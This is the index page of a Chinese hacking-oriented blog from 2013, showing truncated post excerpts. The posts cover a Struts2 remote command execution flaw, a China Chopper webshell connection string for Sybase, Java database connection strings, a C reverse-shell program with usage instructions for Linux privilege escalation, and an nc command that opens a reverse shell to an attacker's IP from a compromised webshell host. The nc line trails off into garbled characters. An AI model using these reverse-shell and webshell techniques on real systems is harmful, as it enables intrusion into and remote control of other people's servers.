Struts2远程命令执行漏洞分析

作者：admin 发布于：2013-1-9 11:03 Wednesday 分类：网络转载

09Jan

阅读全文>>

评论(0) 引用(277) 浏览(31608)

菜刀连接sybase字符串

作者：admin 发布于：2013-1-9 10:09 Wednesday 分类：网络转载

09Jan

<T>XDB</T>
<X>
com.sybase.jdbc2.jdbc.SybDataSource
jdbc:sybase:Tds:ip:port/dataname?user=user&password=pwd
</X>

阅读全文>>

评论(0) 引用(74) 浏览(20627)

JAVA连接各种数据库的连接字符串

作者：admin 发布于：2013-1-9 10:09 Wednesday 分类：Linux

09Jan

.连接oracle数据库
    Class.forName("oracle.jdbc.driver.OracleDriver").newInstance();
    String url="jdbc:oracle:thin:@服务器ip:1521:数据库名称";
    Connection conn=DriverManager.getConnection(url,"用户名","密码");

二.连接mssql数据库

     Class.forName("com.microsoft.jdbc.sqlserver.SQLServerDr...

阅读全文>>

标签: JAVA

评论(0) 引用(179) 浏览(28575)

linux nc 反弹不成功 用c脚本替代

作者：admin 发布于：2013-1-8 19:24 Tuesday 分类：Linux

08Jan

在LINUX下提权的时候 如果主机上的NC不可用，则可用如下的代码 于反弹用一个SHELL来交互使用 用法如下

gcc -o shell shell.c

chmod 777 shell

./shell ip port

就可以了

当然本机应该先监听一个端口

当然也可以把可执行文件直接扔到主机上执行

[c]

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>

void usage...

阅读全文>>

评论(0) 引用(82) 浏览(33410)

linux nc 反弹

作者：admin 发布于：2013-1-8 19:23 Tuesday 分类：Linux

08Jan

本地监听端口：./nc -vv -l -p 监听端口
WEBSHELL上nc反弹shell命令：cd /var/tmp;./nc -vv youip 监听端口 -e /bin/bash7 D( T/ z: z* a

阅读全文>>

评论(0) 引用(231) 浏览(29337)